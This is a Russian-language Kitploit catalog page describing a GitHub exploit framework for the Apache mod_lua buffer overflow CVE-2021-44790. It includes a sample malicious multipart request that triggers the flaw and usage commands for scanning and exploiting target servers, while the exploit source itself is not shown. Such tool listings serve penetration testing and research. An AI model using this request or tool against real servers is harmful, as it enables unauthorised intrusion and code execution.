Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790 — Apache HTTP Server 2.4.x mod_lua Buffer Overflow (CVE-2021-44790) — расширенный фреймворк для эксплуатации с определением версии, многоэтапным сканированием, плагинной архитектурой, профессиональной отчетностью, захватом скриншотов, базой данных SQLite и обнаружением с точностью 95%+. Автор: Sudeepa Wanigarathna. | Kitploit
Инструменты/GitHubGitHub/cerberusmrxi/apache-lua-buffer-overflow-exploit-cve-2021-44790
Сканеры веб-уязвимостейФреймворки для эксплойтовЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubcerberusmrxi/apache-lua-buffer-overflow-exploit-cve-2021-44790

Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790

Репозиторий
1301 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

Apache HTTP Server 2.4.x mod_lua Buffer Overflow (CVE-2021-44790) — расширенный фреймворк для эксплуатации с определением версии, многоэтапным сканированием, плагинной архитектурой, профессиональной отчетностью, захватом скриншотов, базой данных SQLite и обнаружением с точностью 95%+. Автор: Sudeepa Wanigarathna.

Поделиться

🔥 CVE-2021-44790 - Эксплуатация переполнения буфера Apache mod_lua

Version Python License CVE Apache CVSS Author


📋 Обзор

Apache mod_lua Buffer Overflow Exploitation — это продвинутая платформа эксплуатации корпоративного уровня для CVE-2021-44790, критической уязвимости переполнения буфера в модуле mod_lua веб-сервера Apache HTTP Server 2.4.x. Фреймворк предоставляет комплексное fingerprinting, интеллектуальное обнаружение скриптов, многоэтапное сканирование и профессиональные возможности формирования отчётов с точностью обнаружения 95%+.

⚡ Ключевые возможности

ФункцияОписание
🔍 Продвинутое fingerprintingОпределение версии Apache, mod_lua, ОС, архитектуры, WAF, CDN, контейнера, облачного провайдера
🎯 Интеллектуальное обнаружение7+ методов обнаружения, включая robots.txt, sitemap, парсинг HTML, извлечение JavaScript
💥 Многоэтапное сканированиеПодключение → Fingerprinting → Обнаружение → Проверка → Эксплуатация → Отчёты
🧩 Расширяемая система плагиновЛёгкая разработка плагинов для будущих CVE
🌐 Умный HTTP-движокПул соединений, повторные попытки, поддержка HTTP/2, ограничение частоты запросов
📊 Комплексные отчётыJSON, HTML, Markdown, PDF с интерактивными панелями мониторинга
🎨 Красивый терминальный интерфейсБиблиотека Rich с индикаторами выполнения, таблицами и цветным выводом
💾 Исследовательская база данныхХранилище SQLite с полной историей сканирований и поддержкой запросов
📸 Захват скриншотовАвтоматические снимки веб-страниц для сбора доказательств
🚀 Высокая производительность20+ параллельных потоков, 100+ пулов соединений

🎯 Детали уязвимости

АтрибутЗначение
CVE IDCVE-2021-44790
УязвимостьПереполнение буфера (Integer Underflow)
Затронутое ПОApache HTTP Server с 2.4.0 по 2.4.51
Исправленная версияApache HTTP Server 2.4.52 и новее
Компонентмодуль mod_lua
Вектор атакиСеть (удалённо)
Оценка CVSS9.8 (критический)
Влияние на конфиденциальностьВысокое
Влияние на целостностьВысокое
Влияние на доступностьВысокое
Зрелость эксплойтаДоступен proof-of-concept

Техническое описание

Уязвимость присутствует в модуле mod_lua при обработке запросов multipart/form-data. Целочисленное переполнение вниз (integer underflow) в функции lua_request_parsebody() может привести к переполнению буфера в куче (heap-based buffer overflow), что потенциально позволяет удалённое выполнение кода.

POST /process.lua HTTP/1.1
Host: target.com
Content-Type: multipart/form-data; boundary=4

4
Content-Disposition: form-data; name="name"

0
4

📸 Скриншоты

Основной интерфейсРезультаты fingerprinting
Ход сканированияПанель мониторинга HTML-отчёта

🚀 Быстрый старт

Установка

# Clone the repository
git clone https://github.com/CerberusMrXi/Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790
cd Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790

# Install dependencies
pip install -r requirements.txt

# Verify installation
python3 exploit.py --version

Базовое использование

# Quick vulnerability scan
python3 exploit.py http://target.com

# Verbose scan with exploitation
python3 exploit.py https://target.com --exploit --verbose

# Generate all reports
python3 exploit.py http://target.com --report all

# Research mode with database
python3 exploit.py http://target.com --research

📋 Подробное использование

Параметры командной строки

python3 exploit.py [TARGET] [OPTIONS]
ПараметрОписаниеПример
TARGETЦелевой URLhttp://target.com
--config FILEФайл конфигурации--config config.yaml
--threads NКоличество потоков--threads 30
--timeout NТаймаут запроса (в секундах)--timeout 15
--proxy URLURL прокси-сервера--proxy http://127.0.0.1:8080
--verboseПодробный вывод--verbose
--scan-onlyСканирование без эксплуатации--scan-only
--exploitВключить эксплуатацию--exploit
--all-payloadsИспользовать все полезные нагрузки--all-payloads
--report FORMATФормат отчёта (json/html/markdown/all)--report all
--output DIRВыходная директория--output /path/to/reports/
--researchВключить режим исследования--research
--database FILEПуть к базе данных--database luastorm.db
--screenshotДелать скриншоты--screenshot
--batch FILEПакетный файл со списком целей--batch targets.txt
--query SQLВыполнить запрос к базе данных--query "SELECT * FROM targets"

Примеры

1. Базовая оценка уязвимости

python3 exploit.py https://example.com --verbose --report all

2. Сканирование корпоративной среды

python3 exploit.py https://internal-server.com \
    --proxy http://proxy.corp.com:8080 \
    --threads 10 \
    --timeout 15 \
    --verbose \
    --report all \
    --output /var/log/security/

3. Полный пентест

python3 exploit.py https://client.com \
    --threads 30 \
    --timeout 10 \
    --exploit \
    --all-payloads \
    --report all \
    --screenshot \
    --research \
    --verbose \
    --output /pentest/client_name/

4. Пакетное сканирование

python3 exploit.py --batch targets.txt --config config.yaml

5. Запросы к базе данных

# Show all vulnerable targets
python3 exploit.py --query "SELECT * FROM targets WHERE vulnerable=1"

# Get statistics
python3 exploit.py --query "SELECT COUNT(*) as total, SUM(vulnerable) as vulnerable FROM targets"

⚙️ Конфигурация

config.yaml

# ----------------------------------------------------------------------------
# LuaStorm Exploit Framework - Configuration File
# ----------------------------------------------------------------------------
Скачать инструмент